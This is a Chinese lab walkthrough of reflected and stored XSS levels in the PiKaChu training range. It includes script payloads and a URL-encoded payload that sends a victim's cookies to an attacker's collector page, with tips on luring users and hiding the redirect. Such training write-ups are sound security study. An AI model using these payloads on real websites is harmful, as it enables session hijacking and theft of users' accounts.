[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞(上)

简介: [PiKaChu靶场通关]Cross-Site Scripting XSS漏洞

PiKaChu通关 XSS漏洞

一、反射型(get)

二、反射型(post)

搭建环境

三、存储型xss

漏洞利用

1、注入跳转网页

2、网站钓鱼

3、获取键盘记录

四、DOM型XSS

漏洞利用

1、利用JavaScript伪协议

2、绕过、闭合

五、 DOM型XSS-X

六、XSS盲打

七、Xss之过滤

漏洞利用

八、XSS之htmlspecialchars

分析

漏洞利用

九、XSS之href输出

十、XSS之js输出

漏洞利用

一、反射型(get)

如下图中,我们输入了20个1,发现不能再输入了,我们猜测是有字数限制:

image.png

F12找到输入框,发现我们输入的上限只有20个字符,删除或修改为100即可:

image.png

payload:

<script>alert('拈花倾城')</script>

image.png

弹窗如下图:

image.png

二、反射型(post)

右上角的提示中有登陆的账号密码

image.png

登陆成功之后我们发现界面和get型是一样的,但是本质是不同的

1.  GET方式中,  攻击代码是直接暴露在URL中的
2.  POST方式参数内容不会出现在URL中

搭建环境

pikachu靶场自带了一个xss后台, 地址为:

\pikachu\pkxss\index.php


ps: pkxss目录下还有一个inc/config.inc.php文件需要配置, 配置完成之后, 访问上面地址, 初始化数据库:

image.png

配置成功之后访问后台:

image.png

登陆成功之后,界面有三个模块,我们选择cookie

image.png

这里是存放受害人cookie的地方:

image.png

首先修改xss后台下的pkxss/xcookie/cookie.php文件,将IP地址改为漏洞服务器的地址:

image.png

诱使用户点击攻击网址:

http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F127.0.0.1%2Fpikachu%2fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E &submit=submit

127.0.0.1是攻击者收集受害用户cookie的服务器地址(也是本地), (需要进行URL编码才能访问)

访问之后, 自动重定向首页, (是为了不让用户察觉被攻击的事实), 如果重定向其他地址, 用户就会知道被攻击了:

如下图,存放着两个cookie的信息:

image.png

三、存储型xss

我们发现是一个留言板,留言板将我们输入的内容写到网页中, 并且存储到网站的数据库, 当利用xss漏洞时, 那么受到的攻击将是持久化的,我们再次访问也是可以看到的:

payload:

<script>alert('拈花倾城')</script>

image.png每次当不同的用户访问这个留言板时, 都会触发这个js代码, 因为是存储在数据库里(存储型)。

相关文章
|
2月前
|
安全 JavaScript 前端开发
XSS漏洞的危害
XSS漏洞的危害
40 1
|
21小时前
|
存储 JSON 安全
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
|
25天前
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
25天前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
25天前
|
开发框架 安全 JavaScript
xss漏洞原理(四)自动化XSS
xss漏洞原理(四)自动化XSS
|
2月前
|
JSON 安全 JavaScript
Web安全-JQuery框架XSS漏洞浅析
Web安全-JQuery框架XSS漏洞浅析
296 2
|
25天前
|
存储 Web App开发 安全
XSS漏洞原理(三)存储型
XSS漏洞原理(三)存储型
|
25天前
|
安全 Apache PHP
XSS漏洞理由(二)反射型
XSS漏洞理由(二)反射型
|
25天前
|
存储 安全 JavaScript
xss漏洞简介
xss漏洞简介
|
2月前
|
存储 安全 Java
发现 XSS 漏洞?别急!SpringBoot这招轻松搞定!
在SpringBoot中,发现XSS(跨站脚本)漏洞时,可以通过一系列措施来轻松搞定这些安全问题。XSS攻击允许攻击者在受害者的浏览器中注入恶意脚本,这些脚本可以窃取用户的敏感信息、劫持用户会话或进行其他恶意操作。以下是一些在SpringBoot中修复XSS漏洞的有效方法
172 7